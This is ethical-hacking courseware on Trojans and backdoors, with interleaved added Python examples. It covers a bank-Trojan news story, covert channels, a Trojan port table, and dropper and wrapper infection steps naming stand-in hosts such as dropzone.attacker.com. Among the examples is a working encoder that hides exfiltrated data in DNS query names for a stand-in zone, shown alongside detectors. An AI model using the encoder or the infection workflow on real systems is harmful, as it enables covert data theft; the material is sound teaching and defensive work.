Ethical Hacking and Countermeasures v8
Module 06: Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Engineered by Hackers. Presented by Professionals.

Module 06 Page 828
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Security News
Cyber-Criminals Plan Massive Trojan Attack on 30 Banks
Oct 05, 2012 1:24 PM EST
A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appears to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post yesterday. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "anti-American motives," but simply because American banks are less likely to have deployed two-factor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-in-the-middle session hijacking attack.

Source: http://securitywatch.pcmag.com
"A cyber gang has recently communicated its plans to launch a Trojan attack spree on 30 American banks as part of a large-scale orchestrated crimeware campaign," Ahuvia said. Potential targets and relevant law enforcement agencies have already been notified, RSA said. RSA FraudAction was not sure how far along the recruitment campaign has gone, or when the attacks are expected. While it's possible revealing the gang's plans may cause the criminals to scuttle their operation, it may just cause the group to modify the attack. "There are so many Trojans available and so many points of failure in security that could go wrong, that they'd still have some chance of success," Ahuvia said.

Anatomy of the Attack

The proposed cyber-attack consists of several parts. The first part involves infecting victim computers with the variant of the Gozi Trojan, which RSA has dubbed Gozi Prinimalka. Once the computer has been compromised, it will communicate with the botmaster's computer, which has a "virtual machine syncing module," capable of duplicating the victim's PC settings, such as the time zone, screen resolution, cookies, browser type, and installed software IDs, into a virtual machine, RSA said. When the attacker accesses victim accounts using the cloned system, the virtual machine appears to be a legitimate system using the last-known IP address for the victim's computer, RSA said. This cloning module would make it easy for the attackers to log in and initiate wire transfers. The attackers also plan to use VoIP phone flooding software to prevent victims from receiving confirmation calls or texts verifying online account transfers and activity, RSA said. The recruits have to make an initial investment in hardware and agree to training on how to deploy the Gozi Trojan, Ahuvia wrote. They will receive executable files, but not the compilers used to create the Trojan. In return, the new partners in this venture will receive a cut of the profits.

Trojan Behind Previous Attacks

The Trojan is not as well-known as others, such as SpyEye or Citadel, nor is it as widely available, Ahuvia said. Its relative obscurity means antivirus and security tools are less likely to flag it as malicious. RSA has linked the Gozi Trojan to previous attacks responsible for more than $5 million in losses in the United States in 2008. The researchers have linked the Trojan to a group called the HangUp Team, and speculated the same group was behind this latest campaign. The way the attack is structured, it is very likely the targeted institutions won't even realize they'd been affected till at least a month or two after the attacks. "The gang will set a prescheduled D-day to launch its spree, and attempt to cash out as many compromised accounts as possible before its operations are ground to a halt by security systems," Ahuvia said.
Copyright 1996-2012 Ziff Davis, Inc.
By Fahmida Y. Rashid
http://securitywatch.pcmag.com/none/303577-cyber-criminals-plan-massive-trojan-attack-on-30-banks
Module Objectives

The main objective of this module is to provide you with knowledge about various kinds of Trojans and backdoors, the way they propagate or spread on the Internet, the symptoms of these attacks, the consequences of Trojan attacks, and the various ways to protect network or system resources from Trojans and backdoors. This module also describes the penetration testing process to enhance your security against Trojans and backdoors. This module familiarizes you with:

- What Is a Trojan?
- Types of Trojans
- What Do Trojan Creators Look For?
- Trojan Analysis
- Indications of a Trojan Attack
- How to Detect Trojans
- Common Ports Used by Trojans
- Trojan Countermeasures
- How to Infect Systems Using a Trojan
- Trojan Horse Construction Kit
- Different Ways a Trojan Can Get into a System
- Anti-Trojan Software
- Pen Testing for Trojans and Backdoors
- How to Deploy a Trojan
Module Flow

The module is organized in the following sections: Trojan Concepts, Trojan Infection, Types of Trojans, Trojan Detection, Countermeasures, Anti-Trojan Software, and Penetration Testing.

To understand various Trojans and backdoors and their impact on network and system resources, let's begin with the basic concepts of Trojans. This section describes Trojans and highlights the purpose of Trojans, the symptoms of Trojan attacks, and the common ports used by Trojans.
What Is a Trojan?

- A Trojan is a program in which malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk.
- Unlike viruses and worms, Trojans do not replicate on their own. They spread because users are tricked into copying and running them, and they activate when the user performs a predefined action, such as opening the file.
- With the help of a Trojan, an attacker gets access to the passwords stored on the Trojaned computer and can read personal documents, delete files, display pictures, and/or show messages on the screen.

According to Greek mythology, the Greeks won the Trojan War by entering the fortified city of Troy hidden inside a huge, hollow wooden horse. The Greeks built the horse for their soldiers to hide in and left it in front of the gates of Troy. The Trojans took it for a gift from the Greeks, who appeared to have withdrawn from the war, and so they hauled the horse into their city. At night, the Greek soldiers climbed out of the wooden horse and opened the gates for their army, which then destroyed the city of Troy.

Taking a cue from Greek mythology, a computer Trojan is defined as a "malicious, security-breaking program that is disguised as something benign." A computer Trojan horse is used to enter a victim's computer undetected, granting the attacker unrestricted access to the data stored on that computer and causing immense damage to the victim. For example, a user downloads what appears to be a movie or a music file, but when he or she runs it, it unleashes a dangerous program that may erase the unsuspecting user's disk and send his or her credit card numbers and passwords to a stranger. A Trojan can also be wrapped into a legitimate program, meaning that this program may have hidden functionality that the user is unaware of. In another scenario, a victim may also be used as an intermediary to attack others, without his or her knowledge. Attackers can use the victim's computer to commit illegal denial-of-service attacks such as those that virtually crippled the DALnet IRC network for months on end.
(DALnet is an Internet Relay Chat (IRC) network, a form of instant communication over the Internet.)

Trojan horses run with the same level of privileges as the victim user. If the victim has the privileges, the Trojan can delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilege-elevation attacks). The Trojan horse can also attempt to exploit a vulnerability to increase its level of access beyond that of the user running it. If successful, the Trojan operates with elevated privileges and may install further malicious code on the victim's machine.

A compromise of any system on a network may affect the other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or in a trivially encrypted form are particularly vulnerable: if one system on such a network is compromised, the intruder may be able to record user names, passwords, and other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate the victim's system as the source of an attack, for instance by spoofing, and thereby cause the victim to incur liabilities.

[Figure: the attacker sends "Send me credit card details", "Send me Facebook account information", and "Send me e-banking login info" to Trojan-infected victims in Chicago, London, and Paris; the Trojans reply with the credit card number and expiry date, the Facebook login and profile, and the bank ATM and PIN code.]
FIGURE 6.1: Attacker extracting sensitive information from systems infected with a Trojan
Communication Paths: Overt and Covert Channels

Overt Channel: A legitimate communication path within a computer system, or network, for the transfer of data. Examples of overt channels include games or any legitimate program, such as Poker.exe (a legitimate application).

Covert Channel: An unauthorized channel used for transferring sensitive data within a computer system, or network. The simplest form of covert channel is a Trojan, such as Trojan.exe (a keylogger that steals passwords) bundled with the legitimate Poker.exe.

Overt means something that is explicit, obvious, or evident, whereas covert means something that is secret, concealed, or hidden. An overt channel is a sanctioned channel for the transfer of data or information within the network of a company; it operates inside the company's security controls and is used for the purpose it was designed for. A covert channel, on the other hand, is an unauthorized, hidden path used to move data out of a network. Covert channels are methods by which an attacker hides data inside a protocol or resource that was not meant to carry it, so that the transfer goes unnoticed. They commonly rely on tunneling, which carries one protocol inside another, for example data encoded in DNS query names or in the payload of ICMP echo requests. Because a covert channel uses fields or behaviour that were never intended for information exchange, standard security controls do not inspect it and cannot readily detect it. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine and to carry its traffic afterwards.
Overt Channel
  A legitimate communication path within a computer system, or network, for the transfer of data.
  An overt channel can be exploited to create a covert channel by carefully selecting components of the overt channel that are idle or unrelated to its purpose.

Covert Channel
  A channel that transfers information within a computer system, or network, in a way that violates the security policy.
  The simplest form of covert channel is a Trojan.

TABLE 6.1: Comparison between Overt Channel and Covert Channel
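The tunneling technique described above, as an added example that is not part of the EC-Council courseware: exfiltrated bytes are hidden in the labels of DNS queries for an attacker-controlled zone (the zone name exfil.example, the chunk size and the detection thresholds are assumptions for illustration), and the zone's authoritative server reassembles them. No packets are sent; the block shows the encoder, the decoder, and the name-based check a defender can run over resolver logs, with a constructed sample secret.

```python
r"""Added example (not from the original courseware): a DNS-name covert
channel and a simple detector for it.

The data rides inside an allowed protocol: every recursive resolver will
forward a query for <label>.exfil.example to that zone's name server, which
is where the attacker reads it back. Nothing is transmitted here.
"""
import base64
import math
from collections import Counter

ZONE = "exfil.example"   # assumed attacker-controlled zone, for illustration
CHUNK = 30               # base32 characters per label (DNS allows 63 per label)


def encode_covert(data: bytes, zone: str = ZONE) -> list[str]:
    """Hide `data` in query names of the form <seq>.<base32 chunk>.<zone>.

    base32 keeps the labels inside the hostname character set; the '='
    padding is dropped here and restored by the decoder."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    return [f"{i // CHUNK}.{b32[i:i + CHUNK]}.{zone}"
            for i in range(0, len(b32), CHUNK)]


def decode_covert(names, zone: str = ZONE) -> bytes:
    """Reassemble the data from the names seen at the authoritative server.

    Queries may arrive out of order or more than once (resolver retries), so
    chunks are keyed by sequence number and sorted before joining."""
    suffix = "." + zone
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated query, not part of the channel
        seq, chunk = name[:-len(suffix)].split(".", 1)
        chunks[int(seq)] = chunk
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore base32 padding
    return base64.b32decode(b32)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores well above ordinary hostnames."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def is_suspicious_query(name: str, min_len: int = 20,
                        min_entropy: float = 3.5) -> bool:
    """Heuristic detection: a long, high-entropy label below the zone apex.

    Simplification: the last two labels are treated as the registrable
    domain. A real deployment would use the public suffix list and also
    count distinct names per zone, since tunnels also stand out by volume."""
    labels = name.lower().split(".")[:-2]
    longest = max(labels, key=len, default="")
    return len(longest) >= min_len and shannon_entropy(longest) >= min_entropy


if __name__ == "__main__":
    secret = b"user=alice;pin=9753;"             # constructed sample
    queries = encode_covert(secret)
    for q in queries:
        print(q, "<- flagged" if is_suspicious_query(q) else "")
    assert decode_covert(reversed(queries)) == secret
    print("benign www.example.com flagged:", is_suspicious_query("www.example.com"))
```

The second label is short because the sample only fills one full chunk; the entropy check fires on the first query alone, which is all a detector needs, since a real transfer produces hundreds of such names against one zone.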
Purpose of Trojans

Trojan horses are dangerous malicious programs that affect computer systems without the victim's knowledge. The purpose of a Trojan is to:

- Delete or replace the operating system's critical files
- Generate fake traffic to create DoS attacks
- Download spyware, adware, and malicious files
- Record screenshots, audio, and video of the victim's PC
- Steal information such as passwords, security codes, and credit card information using keyloggers
- Disable firewalls and antivirus software
- Create backdoors to gain remote access
- Infect the victim's PC as a proxy server for relaying attacks
- Use the victim's PC as part of a botnet to perform DDoS attacks
- Use the victim's PC for spamming and blasting email messages
What Do Trojan Creators Look For?

Trojans are written to steal information from other systems and to exercise control over them. Trojans look for the target's personal information and, if found, return it to the Trojan writer (attacker). They can also allow attackers to take full control of a system. Trojans are not used solely for destructive purposes; they can also be used to spy on someone's machine and access private and/or sensitive information. Trojans are created for the following reasons:

- To steal sensitive information, such as:
  - Credit card information, which can be used for domain registration as well as for shopping.
  - Account data such as email passwords, dial-up passwords, and web services passwords. Email addresses also help attackers to spam.
  - Important company projects, including presentations and work-related papers, which could be the targets of attackers working for rival companies.
- Attackers can use the target's computer for storing archives of illegal material, such as child pornography. The target can continue to use the computer with no idea of the illegal activities for which it is being used.
- Attackers can use the target's computer as an FTP server for pirated software.
- Script kiddies may just want to have fun with the target's system. They might plant a Trojan in the system, which then starts acting strangely: the CD tray opens and closes frequently, the mouse functions improperly, etc.
- The compromised system might be used for other illegal purposes, and the target would be held responsible for all illegal activities if the authorities discover them.

FIGURE 6.2: Hacker stealing credit card information from a victim
Indications of a Trojan Attack

A Trojan is software designed to steal data and damage your system. It creates a backdoor that lets attackers intrude into your system in stealth mode. The system becomes vulnerable to the Trojan, and attackers can easily launch their attack if it is not safeguarded. Trojans can enter your system by various means, such as email attachments, downloads, instant messages, open ports, etc. The following are some of the indications you may notice on your system when it is attacked by a Trojan:

- CD-ROM drawer opens and closes by itself
- Computer browser is redirected to unknown pages
- Strange chat boxes appear on the target's computer
- Documents or messages are printed from the printer by themselves
- Functions of the right and left mouse buttons are reversed
- Abnormal activity by the modem, network adapter, or hard drive
- Account passwords are changed, or there is unauthorized access
- Strange purchase statements appear in the credit card bills
- The ISP complains to the target that his or her computer is IP scanning
- People know too much personal information about the target
Indications of a Trojan Attack (Cont'd)

Though Trojans run in stealth mode, they exhibit some characteristics by which you can determine the presence of a Trojan on your computer. The following are typical symptoms of a Trojan horse infection:

- Antivirus software is disabled or does not work properly
- The taskbar disappears
- Windows color settings change
- Computer screen flips upside down or inverts
- Screensaver settings change automatically
- Wallpaper or background settings change
- Windows Start button disappears
- Mouse pointer disappears or moves by itself
- The computer shuts down and powers off by itself
- Ctrl+Alt+Del stops working
- Repeated crashes, or programs open and close unexpectedly
- The computer monitor turns itself off and on
Common Ports Used by Trojans

IP ports play an important role in connecting your computer to the Internet: surfing the web, downloading information and files, running software updates, and sending and receiving email and messages all pass through them. Each service on a computer sends and receives on its own port. Users need a basic understanding of the state of an "active connection" and of the ports commonly used by Trojans to determine whether a system has been compromised. A socket can be in several states, but the "listening" state is the important one in this context: it is generated when a system binds a port number and waits for another system to connect. Trojans that provide a remote backdoor return to the listening state whenever the system is rebooted, because they register themselves to start automatically. Some Trojans use more than one port, as one port may be used for "listening" and the other(s) for data transfer. The ports in the table below are the defaults of the Trojans named; most of them can be reconfigured, and many newer Trojans connect outbound over ports such as 80 or 443 instead of listening at all, so a listener on a listed port is a lead to investigate rather than proof, and the absence of such a listener is not proof of a clean system.
Port          Trojan
2             Death
20            Senna Spy
21            Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
22            Shaft
23            Tiny Telnet Server
25            Antigen, Email Password Sender, Terminator, WinPC, WinSpy
31            Hackers Paradise
80            Executor
421           TCP Wrappers trojan
456           Hackers Paradise
555           Ini-Killer, Phase Zero, Stealth Spy
666           Satanz Backdoor
1001          Silencer, WebEx
1011          Doly Trojan
1095-98       RAT
1170          Psyber Stream Server, Voice
1234          Ultors Trojan
1243          SubSeven 1.0-1.8
1245          VooDoo Doll
1492          FTP99CMP
1600          Shivka-Burka
1807          SpySender
1981          Shockrave
1999          BackDoor 1.00-1.03
2001          Trojan Cow
2023          Ripper
2115          Bugs
2140          The Invasor
2155          Illusion Mailer, Nirvana
3129          Masters Paradise
3150          The Invasor
4092          WinCrash
4567          File Nail 1
4590          ICQTrojan
5000          Bubbel
5001          Sockets de Troie
5321          Firehotcker
5400-02       Blade Runner
5569          Robo-Hack
6670-71       DeepThroat
6969          GateCrasher, Priority
7000          Remote Grab
7300-08       NetMonitor
7789          ICKiller
8787          BackOrifice 2000
9872-9875     Portal of Doom
9989          iNi-Killer
10607         Coma 1.0.9
11000         Senna Spy
11223         Progenic trojan
12223         Hack'99 KeyLogger
12345-46      GabanBus, NetBus
12361, 12362  Whack-a-mole
16969         Priority
20001         Millennium
20034         NetBus 2.0, Beta-NetBus 2.01
21544         GirlFriend 1.0, Beta-1.35
22222         Prosiak
23456         Evil FTP, Ugly FTP
26274         Delta
30100-02      NetSphere 1.27a
31337-38      Back Orifice, DeepBO
31339         NetSpy DK
31666         BOWhack
33333         Prosiak
34324         BigGluck, TN
40412         The Spy
40421-26      Masters Paradise
47262         Delta
50505         Sockets de Troie
50766         Fore
53001         Remote Windows Shutdown
54321         SchoolBus .69-1.11
61466         Telecommando
65000         Devil

TABLE 6.2: Common ports used by Trojans
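How a practitioner actually uses Table 6.2, as an added example that is not part of the EC-Council courseware: the code below parses netstat output in the common whitespace-separated layout (`netstat -ano` on Windows, `netstat -antp` on Linux) and reports LISTENING sockets whose local port falls on a port or range from the table. The netstat sample is constructed, the PIDs in it are invented, and only a subset of the table is embedded. A hit is a lead, not a verdict: any program can bind any port, and a Trojan can be configured to use one that is not listed, so the next step is always to identify the image behind the PID.

```python
"""Added example (not from the original courseware): check listening sockets
against the Trojan port table."""

# Subset of Table 6.2 as (low, high) inclusive port ranges -> Trojan name(s).
TROJAN_PORTS = {
    (1243, 1243): "SubSeven 1.0-1.8",
    (5400, 5402): "Blade Runner",
    (6670, 6671): "DeepThroat",
    (12345, 12346): "GabanBus, NetBus",
    (20034, 20034): "NetBus 2.0, Beta-NetBus 2.01",
    (31337, 31338): "Back Orifice, DeepBO",
    (54321, 54321): "SchoolBus .69-1.11",
}

# Constructed sample in `netstat -ano` layout; addresses and PIDs are invented.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       2212
  TCP    10.0.0.5:49812         203.0.113.9:443        ESTABLISHED     3104
  TCP    10.0.0.5:49913         198.51.100.7:31337     ESTABLISHED     3104
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       2212
  UDP    0.0.0.0:5353           *:*                                    1544
"""


def parse_netstat(text: str) -> list[dict]:
    """One dict per socket line; banner, header and blank lines are skipped.

    TCP lines carry a State column, UDP lines do not, so the PID is taken
    from the last column rather than a fixed position."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[:3]
        state = parts[3] if proto == "TCP" and len(parts) >= 5 else ""
        pid = int(parts[-1]) if parts[-1].isdigit() else None
        port = int(local.rsplit(":", 1)[1])   # rsplit copes with [::]:135 too
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "port": port, "state": state, "pid": pid})
    return rows


def lookup_trojan(port: int):
    """Trojan name(s) the table lists for this port, or None."""
    for (low, high), name in TROJAN_PORTS.items():
        if low <= port <= high:
            return name
    return None


def find_suspect_listeners(text: str) -> list[tuple]:
    """(port, trojan, pid) for every listening socket on a listed port.

    Only the listening side is checked. An outbound ESTABLISHED connection
    whose remote port is 31337 says something about the peer, not about a
    backdoor bound on this host, so it is deliberately not matched here."""
    hits = []
    for row in parse_netstat(text):
        if row["proto"] == "TCP" and row["state"] != "LISTENING":
            continue
        name = lookup_trojan(row["port"])
        if name:
            hits.append((row["port"], name, row["pid"]))
    return hits


if __name__ == "__main__":
    for port, name, pid in find_suspect_listeners(SAMPLE_NETSTAT):
        print(f"port {port} LISTENING in PID {pid}: listed for {name}; "
              f"resolve PID {pid} to its image path before drawing conclusions")
```

On the sample the two hits share PID 2212, which is the detail worth acting on: one process listening on two classic backdoor ports deserves a look at its image path and its autostart entry far more than either port number does on its own.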
Module Flow

So far we have discussed various Trojan concepts. Now we will discuss Trojan infection. In this section, we will discuss the different methods adopted by attackers to install Trojans on a victim's system and infect it with this malware.
How to Infect Systems Using a Trojan
Create a new Trojan packet using a Trojan Horse Construction Kit
Create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system
Slide diagram (example of a dropper): installation path c:\windows\system32\svchosts.exe; autostart key under HKLM\Software\Mi...\run\; malicious code with client address client.attacker.com and dropzone dropzone.attacker.com; a genuine application and the malicious code bound by a wrapper into the executable file chess.exe.
How to Infect Systems Using a Trojan
An attacker can control the hardware as well as the software on the system remotely by installing Trojans. When a Trojan is installed on the system, not only does the data become vulnerable to threats, but the attacker may also use the system to perform attacks on third-party systems. Attackers infect the system using Trojans in many ways:
Trojans are included in bundled shareware or downloadable software. When a user downloads those files, Trojans are installed onto the systems automatically.
Users are tricked with different pop-up ads. The ad is programmed by the attacker in such a way that it does not matter whether the user clicks YES or NO; a download starts and the Trojan is installed onto the system automatically.
Attackers send Trojans through email attachments. When those attachments are opened, the Trojan is installed on the system. Users are sometimes tempted to click on different kinds of files such as greeting cards, porn videos, images, etc., and the Trojan is silently installed on the system.
The step-by-step process for infecting machines using a Trojan is as follows:
Step 1: Create a new Trojan packet using a Trojan Horse Construction Kit.
Step 2: Create a dropper, which is a part in a Trojanized packet that installs the malicious code on the target system.
FIGURE 6.3: Illustrating the process of infecting machines using Trojans (1 of 2). The figure shows an example dropper (installation path c:\windows\system32\svchosts.exe; autostart key under HKLM\Software\Mi...\run\), the malicious code configured with client address client.attacker.com and dropzone dropzone.attacker.com, and a wrapper binding the malicious code to a genuine application as the executable file chess.exe.
How to Infect Systems Using a Trojan (Cont'd)
Create a wrapper using wrapper tools to install Trojan on the victim's computer
Propagate the Trojan
How to Infect Systems Using a Trojan (Cont'd)
Step 3: Create a wrapper using tools to install the Trojan on the victim's computer. By using various tools like petite.exe, Graffiti.exe, EliteWrap, etc., a wrapper is created to install the Trojan on the victim's computer.
Step 4: Propagate the Trojan. Computer virus propagation (spreading) can be done through various methods:
An automatic execution mechanism is one method; traditionally it was spread through floppy disks and is now spread through various external devices. Once the computer is booted, the virus automatically spreads over the computer.
Viruses can also be propagated through emails, Internet chats, network sharing, P2P file sharing, network redirecting, or hijacking.
Step 5: Execute the dropper. A dropper is used by attackers to disguise their malware. The user is confused and believes that all the files are genuine or known files. Once it gets loaded onto the host computer, it helps other malware to get loaded and perform its task.
Step 6: Execute the damage routine. Most computer viruses contain a damage routine that delivers payloads. A payload sometimes just displays some images or messages, whereas other payloads can even delete files, reformat hard drives, or cause other damage.
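The dropper in the example above persists by installing a lookalike binary (svchosts.exe next to the real svchost.exe) and registering it under a Run key, which is exactly what a defender can review. The script below is an added example, not code from the courseware or from any dropper; it scores autostart entries for a lookalike name, a user-writable install path, and a system binary name sitting outside the Windows directory. The Run-key entries are a constructed sample modelled on the slide; on a live host they would be read with `winreg` or `reg query`.

```python
"""Review Windows Run-key autostart entries for the dropper pattern described above.

Added example (not CEH courseware). The entries below are a constructed
sample modelled on the slide's dropper, which installs itself as
c:\\windows\\system32\\svchosts.exe and autostarts from a Run key. On a live
host the entries would be read with winreg or `reg query`; here they are inline.
"""
import ntpath
from typing import Dict, List

# Well-known Windows binaries that malware likes to imitate (short constructed list).
SYSTEM_BINARIES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe",
                   "winlogon.exe", "services.exe", "rundll32.exe"}
# Path fragments an ordinary user can write to, so planting a binary there needs no admin rights.
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\documents and settings\\")

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch names one character off a system binary."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def extract_image(command: str) -> str:
    """Pull the executable path out of a Run-key command (quoted path or first token)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]

def assess_entry(command: str) -> List[str]:
    """Reasons an autostart entry resembles a dropper-installed Trojan (empty if none)."""
    reasons: List[str] = []
    lowered = extract_image(command).lower()
    base = ntpath.basename(lowered)
    if base not in SYSTEM_BINARIES:
        for legit in sorted(SYSTEM_BINARIES):
            if edit_distance(base, legit) <= 1:          # svchosts.exe vs svchost.exe
                reasons.append(f"{base} is a lookalike of the system binary {legit}")
                break
    if any(marker in lowered for marker in USER_WRITABLE):
        reasons.append(f"{base} autostarts from a user-writable directory")
    if base in SYSTEM_BINARIES and not lowered.startswith(("c:\\windows\\", "c:\\winnt\\")):
        reasons.append(f"{base} carries a system binary name outside the Windows directory")
    return reasons

def review_run_entries(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious value name to its reasons; clean entries are omitted."""
    flagged: Dict[str, List[str]] = {}
    for name, command in entries.items():
        reasons = assess_entry(command)
        if reasons:
            flagged[name] = reasons
    return flagged

# Constructed sample of HKLM\...\CurrentVersion\Run values (value name -> command).
SAMPLE_RUN_ENTRIES: Dict[str, str] = {
    "ctfmon": r"C:\Windows\system32\ctfmon.exe",
    "svchost": r"c:\windows\system32\svchosts.exe",
    "Chess": r'"C:\Program Files\Chess\chess.exe" /tray',
    "Updater": r'"C:\Documents and Settings\Admin\Local Settings\Temp\explorer.exe"',
}

if __name__ == "__main__":
    for name, reasons in review_run_entries(SAMPLE_RUN_ENTRIES).items():
        print(name + ":\n  " + "\n  ".join(reasons))
```

The edit-distance threshold of 1 is deliberately tight: raising it to 2 starts matching ordinary names (chess.exe is two substitutions from csrss.exe), so the cost of a looser threshold is noise rather than missed svchosts-style fakes.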
FIGURE 6.4: Illustrating the process of infecting machines using Trojans (2 of 2). The figure shows the attacker's Trojan packet (dropper plus wrapper, delivered as chess.exe) reaching the victim's system, where the dropper drops the Trojan and the Trojan code executes.
Wrappers
A wrapper binds a Trojan executable with an innocent-looking .EXE application such as games or office applications
Slide figure: Chess.exe (filesize 90K) and Trojan.exe (filesize 20K) are wrapped together into a single Chess.exe (filesize 110K)
When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground
The two programs are wrapped together into a single file
Attackers might send a birthday greeting that will install a Trojan as the user watches, for example, a birthday cake dancing across the screen
Source: http://www.objs.com
Wrappers are used to bind the Trojan executable with a genuine-looking .EXE application such as games or office applications. When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) at runtime. This makes it possible for the Trojan to get in virtually undetected, since most antivirus software is not able to detect the signatures in the compressed file. The attacker can place several executables inside one executable as well. These wrappers may also support functions such as running one file in the background while another one is running on the desktop.
Technically speaking, wrappers can be considered another type of software "glueware" used to bind other software components together. A wrapper encapsulates the components into a single data source to make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For instance, a Trojan horse might arrive in an email described as a computer game. When the user receives the mail, the description of the game may entice him or her to install it. Although it may, in fact, be a game, it may also be taking other action that is not readily apparent to the user, such as deleting files or mailing sensitive information to the attacker. In another instance, an attacker sends a birthday greeting that will install a Trojan as the user watches, such as a birthday cake dancing across the screen.
FIGURE 6.5: Wrappers. Chess.exe (filesize 90K) plus Trojan.exe (filesize 20K) are wrapped into a single Chess.exe (filesize 110K).
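Because a wrapper appends a second program to the host executable (Chess.exe 90K + Trojan.exe 20K = 110K in the figure), the simplest defender check is to parse the PE section table and inspect whatever lies past the last section's raw data, the so-called overlay. The Python below is an added example, not code from the courseware or from any wrapper tool: `build_minimal_pe` constructs a tiny, non-runnable PE skeleton purely as a test fixture, and the detection logic is a generic overlay check rather than a signature for any particular wrapper.

```python
"""Detect an executable appended after a PE file's declared sections.

Added example (not CEH courseware). build_minimal_pe() constructs a tiny,
non-functional PE image used only as a fixture; find_overlay() and
overlay_contains_executable() work on any real PE file read from disk.
"""
import struct
import sys
from typing import Optional, Tuple

FILE_ALIGNMENT = 512  # typical PE file alignment, used by the fixture builder

def _align(n: int, a: int = FILE_ALIGNMENT) -> int:
    return (n + a - 1) // a * a

def pe_data_end(blob: bytes) -> Optional[int]:
    """Offset just past the last section's raw data, or None if blob is not a PE."""
    if len(blob) < 64 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (num_sections,) = struct.unpack_from("<H", blob, e_lfanew + 6)   # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", blob, e_lfanew + 20)      # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                  # first section header
    end = table + 40 * num_sections
    for i in range(num_sections):
        entry = table + 40 * i
        if entry + 40 > len(blob):
            return None
        raw_size, raw_ptr = struct.unpack_from("<II", blob, entry + 16)  # SizeOfRawData, PointerToRawData
        end = max(end, raw_ptr + raw_size)
    return end

def find_overlay(blob: bytes) -> Tuple[int, bytes]:
    """Return (offset, bytes) of the data that the PE headers do not account for."""
    end = pe_data_end(blob)
    if end is None:
        raise ValueError("not a PE image")
    return end, blob[end:]

def overlay_contains_executable(blob: bytes) -> bool:
    """True when the overlay holds a second, structurally valid PE image."""
    _, overlay = find_overlay(blob)
    pos = overlay.find(b"MZ")
    while pos != -1:
        if pe_data_end(overlay[pos:]) is not None:
            return True
        pos = overlay.find(b"MZ", pos + 1)
    return False

def build_minimal_pe(payload: bytes) -> bytes:
    """Constructed fixture: a one-section PE skeleton carrying `payload` (does not run)."""
    e_lfanew, raw_ptr = 64, FILE_ALIGNMENT
    raw_size = _align(len(payload))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)                  # 64-byte DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)  # i386, 1 section, no optional header
    section = b".text\0\0\0" + struct.pack("<IIII", len(payload), 0x1000, raw_size, raw_ptr) + b"\0" * 16
    headers = dos + coff + section
    return headers + b"\0" * (raw_ptr - len(headers)) + payload + b"\0" * (raw_size - len(payload))

# Constructed fixtures: a clean program and the same program with a second PE appended.
CLEAN_EXE = build_minimal_pe(b"A" * 100)
WRAPPED_EXE = CLEAN_EXE + build_minimal_pe(b"B" * 50)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else WRAPPED_EXE
    off, overlay = find_overlay(data)
    print(f"overlay starts at {off}, {len(overlay)} bytes, embedded PE: {overlay_contains_executable(data)}")
```

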